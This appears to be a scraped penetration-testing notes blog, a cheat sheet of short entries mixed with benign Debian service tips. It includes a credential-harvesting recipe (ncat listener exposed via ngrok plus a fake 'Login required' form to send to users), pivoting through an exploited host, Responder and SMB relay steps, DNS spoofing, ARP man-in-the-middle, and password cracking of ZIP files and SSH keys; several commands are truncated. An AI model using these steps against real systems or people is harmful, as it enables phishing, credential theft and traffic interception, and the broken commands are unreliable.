netcat Uncategorized

Harvest credentials

Start nectat listener

ncat -lvp 4444

Start ngrok to make url accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”; method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>

login prompt


Port Forwarding

Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host

ssh -L 9999: msx@

Use Proxychain to route traffic through exploited host

ssh -D msx@

Usage example nmap scan

proxychains nmap -sT -v
Debian Uncategorized

Debian Tips

How to list all services in Debian

If you want to view the entire services running in the Debian 10, you can run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

Systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check the status of a particular service whether it is running or not. One of such methods is by using init.d. You can execute the command with root privileges having following syntax,

/etc/init.d/{servicename} status

Let’s check the status of the networking service. The complete command should look like the following,

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list here both of the methods.

Start and stop a service using init.d

Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,

/etc/init.d/networking stop

Print route

route -n
Responder Uncategorized

Responder & SMB Relay

1. Run -i<target IP> against target

2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.

3.python -I eth0 –lm

4. python -t <target IP> –u ALL


SMB Relay:

use windows/smb/smb_relay

set target SMBHOST

Configure DNS spoof record
echo “ *” > dns

Run DNS spoof

dnsspoof -i tap0 -f dns

Run Arp Mitm

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i tap0 -t
arpspoof -i tap0 -t

Uncategorized ZIP crack

ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt

Uncategorized Windows Tricks

Windows Tricks

Time Uncategorized


net time -S IP -U “”

date -s time

rdate -n ip

TCPDUMP Uncategorized


tcpdump -i tun0 icmp (for protocol filter)

Steno Uncategorized


Look at picture for content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png
SSH Uncategorized


Use SSH private key


chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ id_rsa > test

john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test